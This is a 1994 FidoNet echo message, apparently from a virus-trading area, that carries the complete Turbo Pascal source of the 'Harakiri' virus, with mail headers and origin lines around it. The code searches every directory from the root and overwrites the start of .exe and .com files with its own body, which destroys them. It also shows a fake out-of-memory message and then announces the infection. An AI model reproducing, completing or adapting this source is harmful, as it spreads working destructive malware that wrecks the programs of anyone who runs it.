;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 19 of 54 ; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : HARAKIRI.PAS ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å) ;* From : Hans Schotel, 2:283/718 (06 Nov 94 16:36) ;* To : Dr T. ;* Subj : HARAKIRI.PAS ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;@RFC-Path: ;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 ;18.n283!not-for-mail ;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org ;{+--------------------------------------------------------------------+} ;{| Harakiri Virus V1.50 91-09-01 |} ;{| WARNING!! WARNING!! This is a virus, compiled under TP 5.5 |} ;{+--------------------------------------------------------------------+} Uses Dos; Const Buf_Size=25; Var Buff : Array[1..5488] of Byte; { Antal som flyttas per g†ng! } DirInfo : SearchRec; Searchfile : String[20]; Debug : Boolean; {------------------------------------------------------------------------} Procedure Infect_File (Myfile:String); Var NumRead, NumWritten : Word; FromF, ToF : File; Begin Assign(FromF,ParamStr(0)); { Open output file } Reset(FromF, 1); { Record size = 1 } If Debug then Writeln (Myfile); Assign(ToF,MyFile); { Open output file } Reset(ToF, 1); { Record size = 1 } BlockRead(FromF,buff,SizeOf(Buff),NumRead); BlockWrite(ToF,buff,NumRead,NumWritten); Close(FromF); Close(ToF); End; {------------------------------------------------------------------} Function Check_File(Myfile:String) : Boolean; Var NumRead : Word; NumWritten : Word; FromF2 : File; FromF : File; j2 : Integer; j1 : Integer; Buf1 : Array[1..Buf_Size] of Byte; { Antal som flyttas per g†ng! } Buf2 : Array[1..Buf_Size] of Byte; { Antal som flyttas per g†ng! } Begin j2:=1; While j2<=Buf_Size do begin Buf1[j2]:=$20; Buf2[j2]:=$20; Inc(j2); end; Check_file := False; Assign(FromF, ParamStr(0)); { Open input file } Reset(FromF, 1); { Record size = 1 } Assign (FromF2, Myfile); Reset (FromF2, 1); If Debug then Write ('--> '); If Debug then Writeln (Myfile); BlockRead(FromF,buf1,SizeOf(buf1),NumRead); BlockRead(FromF2,buf2,SizeOf(buf2),NumRead); j1:=1; While j1<=Buf_Size do begin If Buf1[j1] <> Buf2[j1] then begin If Debug then Writeln ('Ej Infekterad....!'); j1:=10000; Inc (j1); Check_file:=True; end; Inc (j1); end; If j1>=9999 then begin Check_file:=True; end; Close (FromF); Close (FromF2); End; {------------------------------------------------------------------} Procedure Search_4_File (Sdir: String); Var Dir_save : Array[1..100] of string [12]; I,Imax : Integer; Mask : String[80]; Attr : Integer; Any_File_found : Boolean; New_F : Boolean; Antal_Infected : Integer; Begin Antal_Infected:=0; If Debug then Writeln('Sdir = ' ,Sdir); Mask := SDir + SearchFile; Any_File_found := False; FindFirst(Mask, $3F, DirInfo); I := 0; Begin If DosError=0 then begin I := Length( SDir ); end; I := 0; While DosError=0 do begin If DirInfo.name[1] <> '.' then begin Any_File_found := true; If Debug then Writeln(Dirinfo.name); New_F := Check_File (SDir+DirInfo.Name); If New_F=True then begin If Debug then Writeln ('Infecting file'); Infect_File (Sdir+DirInfo.Name); Inc (Antal_Infected); If Antal_Infected >= 4 then begin Writeln ('Program too big to fit in memory'); Halt; end; If Debug then Writeln (Antal_Infected); end; If New_F=False then begin If Debug then Writeln ('File Already Infected'); end; end; FindNext(DirInfo); end; {while} End; Mask := Sdir + '*.*'; FindFirst(Mask, Directory, DirInfo); { look for dir only } Imax := 0; I:= 1; While DosError=0 do { G”r lista ”ver directories..} Begin If DirInfo.Attr and Directory <> 0 then begin If DirInfo.name[1] <> '.' then begin Dir_save[I] := DirInfo.Name; Imax := I; inc(I); end; end; FindNext(DirInfo); End; {while} I:=1; While I <= Imax do begin Search_4_File(SDir + Dir_save[I] + '\'); I:= I+1; end; End; {====Main===================================================================} BEGIN Debug := true; SearchFile := '*.exe'; Search_4_File ('\'); SearchFile := '*.com'; Search_4_File ('\'); Writeln ('Your PC is alive and infected with the HARAKIRI virus!'); END. -+- GoldED/386 2.50.B1016+ + Origin: FidoNet * Mathieu Not‚ris * Brussels-Belgium-Europe (2:283/718) ============================================================================= Yoo-hooo-oo, -! þ The MeÂeO /A=NNNN Set NewExe segment alignment factor --- Aidstest Null: /Kill * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)